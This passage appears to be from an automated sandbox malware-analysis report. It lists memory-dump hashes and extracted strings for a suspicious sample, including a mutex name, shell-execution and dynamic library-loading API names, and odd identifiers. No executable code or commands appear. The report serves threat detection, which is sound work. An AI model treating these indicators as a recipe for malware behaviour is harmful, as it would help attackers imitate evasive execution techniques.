                                                                                                            • Opcode Fuzzy Hash: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction Fuzzy Hash: A0615D71640289EBEF10DF60CC4DFAE3778EB44701F541516EE09BE2E0D6B5AA448B9E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000028.00000002.4182558170.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_40_2_7d0000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction ID: f73ea75220bde8bd69dc00e937059369a65fc715ebf50a15d986ab561d2cee19
                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction Fuzzy Hash: 21B12775A002898FEF10CF24CD44BA937B5FF44314F485926DD09AF3A1D379AA94CB9A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000028.00000002.4182558170.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_40_2_7d0000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                            • API String ID: 0-1163154406
                                                                                                            • Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction ID: 907507b37a6db7bec12c750b1458ef0377fa83188bc63b6da209ce8d4015cd23
                                                                                                            • Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction Fuzzy Hash: AA112131240288ABEF10DEA08D4DFDD37A8AF54B01F441415FA09FE1E0DAB5A700876F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000029.00000002.4186741055.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_41_2_b90000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                            • API String ID: 0-162185446
                                                                                                            • Opcode ID: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction ID: efe4b3745de60f69294dbd33d3736ba1c6c8ffc017fe6f1c9e02df1edc8cc2ee
                                                                                                            • Opcode Fuzzy Hash: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction Fuzzy Hash: 7B616071650288AFEF10EF60CC89FAA37A8EF04B01F540565FE09BE1F0D6B196448B1E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000029.00000002.4186741055.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_41_2_b90000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction ID: bbcabdb9d06c0c4eb48eef452401be8fa713c13d8328e3c11823ba990f65179c
                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction Fuzzy Hash: B7B15C31A102898FEF10DF68CC84BA937E5FF54314F484865DC0DAF2A1D375AA94CB9A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000029.00000002.4186741055.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_41_2_b90000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                            • API String ID: 0-1163154406
                                                                                                            • Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction ID: 5a47a8ec28f9962944f0926895bece027f24397ba12330e5795cb50478d546e9
                                                                                                            • Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction Fuzzy Hash: 68111E31250288AFEF10EFA08D4DFE937A8EB44B01F440425BA09FE0E0DAB19600872E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000002A.00000002.4188308724.0000000000BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_42_2_bb0000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                            • API String ID: 0-162185446
                                                                                                            • Opcode ID: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction ID: 14e0f744825c6d34f50918885119d68434059b138416056687f32b5c91954d94
                                                                                                            • Opcode Fuzzy Hash: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction Fuzzy Hash: 11614E71650288ABEF11EF60CC89FFA37A8EF04701F544555FE09BE1E0D6B196448B5E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000002A.00000002.4188308724.0000000000BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_42_2_bb0000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction ID: 5d493dd25b81d6e6c1f90470409fb383b2df5cd0123922dcba9aaf5f3288c0f8
                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction Fuzzy Hash: 03B12B71A102898FEB10DF18CC44BFA77E5FF44304F484965DC49AF2A1D7B5AA94CB4A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000002A.00000002.4188308724.0000000000BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_42_2_bb0000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                            • API String ID: 0-1163154406
                                                                                                            • Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction ID: 6b23feb8cf80716847a1bb2b612afbaf4052b3bb6d205ed77e83b157567e329f
                                                                                                            • Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction Fuzzy Hash: 5411DE71254289ABEF10EEA08D4DFFE37A8EB44B05F444455BA09FE0E0DAF19644876E